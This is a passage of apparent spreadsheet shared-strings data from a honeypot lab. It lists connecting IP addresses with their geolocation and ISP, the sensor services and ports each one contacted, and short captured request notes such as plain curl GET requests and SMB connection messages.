    <t>SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H38</t>
  </si>
  <si>
    <t>23&amp;&amp;16166&amp;&amp;41959</t>
  </si>
  <si>
    <t>::ffff:dc86:690</t>
  </si>
  <si>
    <t>576921a62b3a3dd9c94490897aacaf86</t>
  </si>
  <si>
    <t>117.197.137.176</t>
  </si>
  <si>
    <t>Kaithal</t>
  </si>
  <si>
    <t>1268593</t>
  </si>
  <si>
    <t>29.8015</t>
  </si>
  <si>
    <t>76.3996</t>
  </si>
  <si>
    <t>::ffff:75c5:89b0</t>
  </si>
  <si>
    <t>2b62ff67db687b416f9f619d5ed5c5a8</t>
  </si>
  <si>
    <t>61.3.54.185</t>
  </si>
  <si>
    <t>Bhimavaram</t>
  </si>
  <si>
    <t>1275947</t>
  </si>
  <si>
    <t>16.5408</t>
  </si>
  <si>
    <t>81.5232</t>
  </si>
  <si>
    <t>::ffff:3d03:36b9</t>
  </si>
  <si>
    <t>af7a6a7515c8b17f769e7a5a730d9b90</t>
  </si>
  <si>
    <t>120.56.87.152</t>
  </si>
  <si>
    <t>::ffff:7838:5798</t>
  </si>
  <si>
    <t>f0ddecbbe1c0fdda814b397e4074ca84</t>
  </si>
  <si>
    <t>59.91.39.83</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H9&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>445&amp;&amp;23</t>
  </si>
  <si>
    <t>{Data_SMB:Incoming connection (59.91.39.83,63035)}&amp;&amp;{Data_SMB:Incoming connection (59.91.39.83,63084)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (59.91.39.83,64101)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_TELNET:NA}</t>
  </si>
  <si>
    <t>::ffff:3b5b:2753</t>
  </si>
  <si>
    <t>0ab56147c46ba06c0e4daf1423cb1c9a</t>
  </si>
  <si>
    <t>185.192.84.26</t>
  </si>
  <si>
    <t>23&amp;&amp;57189</t>
  </si>
  <si>
    <t>Blagoevgrad</t>
  </si>
  <si>
    <t>Gotse Delchev</t>
  </si>
  <si>
    <t>731108</t>
  </si>
  <si>
    <t>2900</t>
  </si>
  <si>
    <t>41.5667</t>
  </si>
  <si>
    <t>23.7333</t>
  </si>
  <si>
    <t>59763</t>
  </si>
  <si>
    <t>GOCE-NET Ltd</t>
  </si>
  <si>
    <t>GOCE</t>
  </si>
  <si>
    <t>2017-03-01</t>
  </si>
  <si>
    <t>::ffff:b9c0:541a</t>
  </si>
  <si>
    <t>ab2beb8a46ca291b5ff5ac68212dec45</t>
  </si>
  <si>
    <t>114.35.90.145</t>
  </si>
  <si>
    <t>114-35-90-145.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H34&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;45423&amp;&amp;80&amp;&amp;23&amp;&amp;9100&amp;&amp;50372&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7223:5a91</t>
  </si>
  <si>
    <t>cc9b54ed93d856408a6079fb462df7b5</t>
  </si>
  <si>
    <t>120.28.168.62</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>56554&amp;&amp;3306</t>
  </si>
  <si>
    <t>Central Visayas</t>
  </si>
  <si>
    <t>Negros Oriental</t>
  </si>
  <si>
    <t>Balayong</t>
  </si>
  <si>
    <t>1728318</t>
  </si>
  <si>
    <t>9.4744</t>
  </si>
  <si>
    <t>123.062</t>
  </si>
  <si>
    <t>2008-03-13</t>
  </si>
  <si>
    <t>GBB-MAKATI</t>
  </si>
  <si>
    <t>::ffff:781c:a83e</t>
  </si>
  <si>
    <t>5ce23a8f05cb4ab087691f9ca09050b8</t>
  </si>
  <si>
    <t>117.197.227.26</t>
  </si>
  <si>
    <t>::ffff:75c5:e31a</t>
  </si>
  <si>
    <t>739bb8c5897d320b18040bb2dc54b71a</t>
  </si>
  <si>
    <t>59.95.95.144</t>
  </si>
  <si>
    <t>::ffff:3b5f:5f90</t>
  </si>
  <si>
    <t>7c569ae79cdcc08f201ffa4e9ff5bf20</t>
  </si>
  <si>
    <t>61.4.72.142</t>
  </si>
  <si>
    <t>MM</t>
  </si>
  <si>
    <t>Myanmar</t>
  </si>
  <si>
    <t>Mandalay Region</t>
  </si>
  <si>
    <t>Mandalay District</t>
  </si>
  <si>
    <t>Mandalay (Chanmyathazi Township)</t>
  </si>
  <si>
    <t>1311874</t>
  </si>
  <si>
    <t>21.943</t>
  </si>
  <si>
    <t>96.0922</t>
  </si>
  <si>
    <t>18399</t>
  </si>
  <si>
    <t>Yatanarpon Teleport Company Limited</t>
  </si>
  <si>
    <t>NET-MM-TELEPORT</t>
  </si>
  <si>
    <t>::ffff:3d04:488e</t>
  </si>
  <si>
    <t>f9710a21f14095c5870dd8396dead2e8</t>
  </si>
  <si>
    <t>114.35.90.231</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-35-90-231.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H13</t>
  </si>
  <si>
    <t>::ffff:7223:5ae7</t>
  </si>
  <si>
    <t>2ceecbb9bc4a4c0134d4b1b52ddb6342</t>
  </si>
  <si>
    <t>190.83.178.92</t>
  </si>
  <si>
    <t>TT</t>
  </si>
  <si>
    <t>Trinidad and Tobago</t>
  </si>
  <si>
    <t>POS</t>
  </si>
  <si>
    <t>Port of Spain</t>
  </si>
  <si>
    <t>Port of Spain (Downtown)</t>
  </si>
  <si>
    <t>3573890</t>
  </si>
  <si>
    <t>10.6556</t>
  </si>
  <si>
    <t>-61.5146</t>
  </si>
  <si>
    <t>27665</t>
  </si>
  <si>
    <t>AS27665</t>
  </si>
  <si>
    <t>Columbus Communications Trinidad Limited.</t>
  </si>
  <si>
    <t>Columbus Communications Trinidad Limited</t>
  </si>
  <si>
    <t>::ffff:be53:b25c</t>
  </si>
  <si>
    <t>8135629c8b0cb0c23ad976481475e97e</t>
  </si>
  <si>
    <t>59.97.145.95</t>
  </si>
  <si>
    <t>::ffff:3b61:915f</t>
  </si>
  <si>
    <t>97c956569d85f606bd43284d62df5161</t>
  </si>
  <si>
    <t>49.37.103.19</t>
  </si>
  <si>
    <t>::ffff:3125:6713</t>
  </si>
  <si>
    <t>79b4eb8ded0edd3ebba487cb45abd9f3</t>
  </si>
  <si>
    <t>117.195.22.6</t>
  </si>
  <si>
    <t>::ffff:75c3:1606</t>
  </si>
  <si>
    <t>0c7923d43db5d98c787f2cabe30f4892</t>
  </si>
  <si>
    <t>59.24.192.181</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H36</t>
  </si>
  <si>
    <t>::ffff:3b18:c0b5</t>
  </si>
  <si>
    <t>1a087f88892086cfaf4dcdceb8451dc9</t>
  </si>
  <si>
    <t>103.186.69.40</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H31</t>
  </si>
  <si>
    <t>1433&amp;&amp;63883&amp;&amp;63940&amp;&amp;63957&amp;&amp;63972&amp;&amp;63989&amp;&amp;64099&amp;&amp;64038&amp;&amp;64073&amp;&amp;64088&amp;&amp;64053&amp;&amp;64221&amp;&amp;64137&amp;&amp;64163&amp;&amp;64180</t>
  </si>
  <si>
    <t>{'cbl.abuseat.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}</t>
  </si>
  <si>
    <t>Bengaluru (Koramangala 1A Block)</t>
  </si>
  <si>
    <t>12.9285</t>
  </si>
  <si>
    <t>77.6332</t>
  </si>
  <si>
    <t>132559</t>
  </si>
  <si>
    <t>Gatik Business Solutions</t>
  </si>
  <si>
    <t>Gatik Greenergy PVT LTD</t>
  </si>
  <si>
    <t>2022-04-12</t>
  </si>
  <si>
    <t>GREENERGYPVTLTD</t>
  </si>
  <si>
    <t>::ffff:67ba:4528</t>
  </si>
  <si>
    <t>1458cec7cd59d7080011651436f52e36</t>
  </si>
  <si>
    <t>14.190.88.125</t>
  </si>
  <si>
    <t>::ffff:ebe:587d</t>
  </si>
  <si>
    <t>56ab76181c7dc62f2e5796723e2eb755</t>
  </si>
  <si>
    <t>117.199.151.55</t>
  </si>
  <si>
    <t>::ffff:75c7:9737</t>
  </si>
  <si>
    <t>bbb087f9ce1174f307ca11a6e0519e1c</t>
  </si>
  <si>
    <t>220.130.182.179</t>
  </si>
  <si>
    <t>220-130-182-179.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:dc82:b6b3</t>
  </si>
  <si>
    <t>bb8dc8531ea49138576c65570bf486bd</t>
  </si>
  <si>
    <t>117.235.145.85</t>
  </si>
  <si>
    <t>::ffff:75eb:9155</t>
  </si>
  <si>
    <t>3f40a6a56fd15a11ae3bdc124148ccbe</t>
  </si>
  <si>
    <t>114.32.166.182</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-32-166-182.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:7220:a6b6</t>
  </si>
  <si>
    <t>52f4d111fe235df85187a59d2e624efd</t>
  </si>
  <si>
    <t>158.140.145.59</t>
  </si>
  <si>
    <t>Singapore (Geylang)</t>
  </si>
  <si>
    <t>389730</t>
  </si>
  <si>
    <t>1.33296</t>
  </si>
  <si>
    <t>103.894</t>
  </si>
  <si>
    <t>56300</t>
  </si>
  <si>
    <t>MYREPUBLIC LIMITED</t>
  </si>
  <si>
    <t>Myrepublic Limited</t>
  </si>
  <si>
    <t>MyRepublic Ltd</t>
  </si>
  <si>
    <t>::ffff:9e8c:913b</t>
  </si>
  <si>
    <t>edf5fa8bfaa1d3e53d123988c39a3028</t>
  </si>
  <si>
    <t>43.224.10.161</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H29</t>
  </si>
  <si>
    <t>gtpl hariom world vision</t>
  </si>
  <si>
    <t>2014-11-17</t>
  </si>
  <si>
    <t>::ffff:2be0:aa1</t>
  </si>
  <si>
    <t>a8cefc84ccf897bced0ab929ae33c919</t>
  </si>
  <si>
    <t>69.145.152.219</t>
  </si>
  <si>
    <t>syn-069-145-152-219.res.spectrum.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>2003-05-13</t>
  </si>
  <si>
    <t>NET-CORE-BB-1</t>
  </si>
  <si>
    <t>2014-02-18</t>
  </si>
  <si>
    <t>::ffff:4591:98db</t>
  </si>
  <si>
    <t>40ee1d6cb5c44ac0ad26d3ed69192ea5</t>
  </si>
  <si>
    <t>120.61.82.60</t>
  </si>
  <si>
    <t>::ffff:783d:523c</t>
  </si>
  <si>
    <t>5ba9993ad6604c8082c5be2654fd20c6</t>
  </si>
  <si>
    <t>59.182.114.151</t>
  </si>
  <si>
    <t>::ffff:3bb6:7297</t>
  </si>
  <si>
    <t>2a198379b05f81bf0cf6de616da48b93</t>
  </si>
  <si>
    <t>122.172.81.147</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (122.172.81.147,15392)}&amp;&amp;{Data_SMB:Incoming connection (122.172.81.147,6515)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:7aac:5193</t>
  </si>
  <si>
    <t>5cc81d1560838401c4db2b9661fc2b36</t>
  </si>
  <si>
    <t>59.184.63.65</t>
  </si>
  <si>
    <t>::ffff:3bb8:3f41</t>
  </si>
  <si>
    <t>a1d44ba3371990cd050442e410a54b06</t>
  </si>
  <si>
    <t>61.3.118.181</t>
  </si>
  <si>
    <t>::ffff:3d03:76b5</t>
  </si>
  <si>
    <t>abaf1f8d7399e541468a818c98856744</t>
  </si>
  <si>
    <t>123.203.64.187</t>
  </si>
  <si>
    <t>NA&amp;&amp;123203064187.ctinets.com</t>
  </si>
  <si>
    <t>2006-12-18</t>
  </si>
  <si>
    <t>::ffff:7bcb:40bb</t>
  </si>
  <si>
    <t>ed01501aa0f6a57aacb06a49488a48d4</t>
  </si>
  <si>
    <t>59.25.224.198</t>
  </si>
  <si>
    <t>Nam-gu</t>
  </si>
  <si>
    <t>Bongdeok-dong</t>
  </si>
  <si>
    <t>8692253</t>
  </si>
  <si>
    <t>35.8293</t>
  </si>
  <si>
    <t>128.596</t>
  </si>
  <si>
    <t>::ffff:3b19:e0c6</t>
  </si>
  <si>
    <t>a3c30c4d8aaf519bb58ffbff13fda555</t>
  </si>
  <si>
    <t>117.233.188.120</t>
  </si>
  <si>
    <t>::ffff:75e9:bc78</t>
  </si>
  <si>
    <t>9010027b3ebcb30b4765c4e972de7d5a</t>
  </si>
  <si>
    <t>59.182.154.123</t>
  </si>
  <si>
    <t>23&amp;&amp;37163</t>
  </si>
  <si>
    <t>::ffff:3bb6:9a7b</t>
  </si>
  <si>
    <t>13d098617a471f5594e533697dbe1a19</t>
  </si>
  <si>
    <t>113.210.21.35</t>
  </si>
  <si>
    <t>MAXIS-AS1-AP</t>
  </si>
  <si>
    <t>::ffff:71d2:1523</t>
  </si>
  <si>
    <t>8d55e36d3d5d37ac458df75ab4dd8496</t>
  </si>
  <si>
    <t>163.53.206.98</t>
  </si>
  <si>
    <t>2014-07-11</t>
  </si>
  <si>
    <t>RAINBOWISP</t>
  </si>
  <si>
    <t>::ffff:a335:ce62</t>
  </si>
  <si>
    <t>4ee5d99e0e524a16a5098ef56f0f4ed1</t>
  </si>
  <si>
    <t>110.224.81.45</t>
  </si>
  <si>
    <t>Sirumugai</t>
  </si>
  <si>
    <t>1256027</t>
  </si>
  <si>
    <t>641302</t>
  </si>
  <si>
    <t>11.3214</t>
  </si>
  <si>
    <t>77.0052</t>
  </si>
  <si>
    <t>::ffff:6ee0:512d</t>
  </si>
  <si>
    <t>307e4ce6386f55c841544afa24993f92</t>
  </si>
  <si>
    <t>116.49.199.208</t>
  </si>
  <si>
    <t>n11649199208.netvigator.com</t>
  </si>
  <si>
    <t>Tai Kok Tsui</t>
  </si>
  <si>
    <t>1818721</t>
  </si>
  <si>
    <t>22.3198</t>
  </si>
  <si>
    <t>114.162</t>
  </si>
  <si>
    <t>2007-03-16</t>
  </si>
  <si>
    <t>::ffff:7431:c7d0</t>
  </si>
  <si>
    <t>e218660aedf02aae8113dc1d5b6282ef</t>
  </si>
  <si>
    <t>117.216.1.65</t>
  </si>
  <si>
    <t>::ffff:75d8:141</t>
  </si>
  <si>
    <t>11448f223c8c8929462cf41bf45a3de5</t>
  </si>
  <si>
    <t>220.134.152.107</t>
  </si>
  <si>
    <t>220-134-152-107.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_PJL_H24</t>
  </si>
  <si>
    <t>23&amp;&amp;9100</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:dc86:986b</t>
  </si>
  <si>
    <t>f69b29bc171394b0a378f910c4933830</t>
  </si>
  <si>
    <t>122.117.95.52</t>
  </si>
  <si>
    <t>122-117-95-52.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_DNS_H32&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_MT-CPA_H43</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;53&amp;&amp;38705&amp;&amp;56680&amp;&amp;58949&amp;&amp;59042&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:7a75:5f34</t>
  </si>
  <si>
    <t>8d649113afc4a5e6b8903caf086e89d8</t>
  </si>
  <si>
    <t>114.33.28.148</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-33-28-148.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H11</t>
  </si>
  <si>
    <t>23&amp;&amp;58285&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7221:1c94</t>
  </si>
  <si>
    <t>19607e6ee03acc84abf87ed01fa5423a</t>
  </si>
  <si>
    <t>106.219.244.16</t>
  </si>
  <si>
    <t>Ranchi</t>
  </si>
  <si>
    <t>1258526</t>
  </si>
  <si>
    <t>23.3432</t>
  </si>
  <si>
    <t>85.3094</t>
  </si>
  <si>
    <t>BHARTI-MOBILITY-AS-AP</t>
  </si>
  <si>
    <t>Bcl West</t>
  </si>
  <si>
    <t>::ffff:6adb:f410</t>
  </si>
  <si>
    <t>1033c5119962ca09854660e70f6863bf</t>
  </si>
  <si>
    <t>122.171.21.35</t>
  </si>
  <si>
    <t>::ffff:7aab:1523</t>
  </si>
  <si>
    <t>44771acfcd27f5218643c21f1f5f4e76</t>
  </si>
  <si>
    <t>184.82.214.255</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H28</t>
  </si>
  <si>
    <t>Bang Na</t>
  </si>
  <si>
    <t>1620755</t>
  </si>
  <si>
    <t>13.6674</t>
  </si>
  <si>
    <t>100.642</t>
  </si>
  <si>
    <t>2001-11-01</t>
  </si>
  <si>
    <t>::ffff:b852:d6ff</t>
  </si>
  <si>
    <t>f2a46400b0fd1059fd17018841594b94</t>
  </si>
  <si>
    <t>188.115.146.67</t>
  </si>
  <si>
    <t>188-115-146-67.broadband.tenet.odessa.ua&amp;&amp;NA</t>
  </si>
  <si>
    <t>698740</t>
  </si>
  <si>
    <t>65001</t>
  </si>
  <si>
    <t>46.4857</t>
  </si>
  <si>
    <t>30.7438</t>
  </si>
  <si>
    <t>::ffff:bc73:9243</t>
  </si>
  <si>
    <t>a09035d7e784bcf00e63b8b9bb5f3ff1</t>
  </si>
  <si>
    <t>59.96.200.128</t>
  </si>
  <si>
    <t>::ffff:3b60:c880</t>
  </si>
  <si>
    <t>817d0aa2c0b5660ad1cae21bf324adae</t>
  </si>
  <si>
    <t>117.197.162.156</t>
  </si>
  <si>
    <t>::ffff:75c5:a29c</t>
  </si>
  <si>
    <t>f7ad12951173ae7919a2c80a0122cf8f</t>
  </si>
  <si>
    <t>122.187.154.238</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SSH_H13</t>
  </si>
  <si>
    <t>1433&amp;&amp;22</t>
  </si>
  <si>
    <t>Arunachal Pradesh</t>
  </si>
  <si>
    <t>East Kameng</t>
  </si>
  <si>
    <t>Seppa</t>
  </si>
  <si>
    <t>12524323</t>
  </si>
  <si>
    <t>790102</t>
  </si>
  <si>
    <t>27.361</t>
  </si>
  <si>
    <t>93.0393</t>
  </si>
  <si>
    <t>Swiftmail Communications Limited</t>
  </si>
  <si>
    <t>::ffff:7abb:9aee</t>
  </si>
  <si>
    <t>d0cf4554ff9634c97550184d168a9908</t>
  </si>
  <si>
    <t>121.200.51.84</t>
  </si>
  <si>
    <t>::ffff:79c8:3354</t>
  </si>
  <si>
    <t>b29133d74b70d05a502fe9936111728e</t>
  </si>
  <si>
    <t>122.116.175.245</t>
  </si>
  <si>
    <t>122-116-175-245.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;11467&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7a74:aff5</t>
  </si>
  <si>
    <t>d1b0f7c457cc7fdfc3ed6e045f29f347</t>
  </si>
  <si>
    <t>125.228.215.103</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-228-215-103.hinet-ip.hinet.net</t>
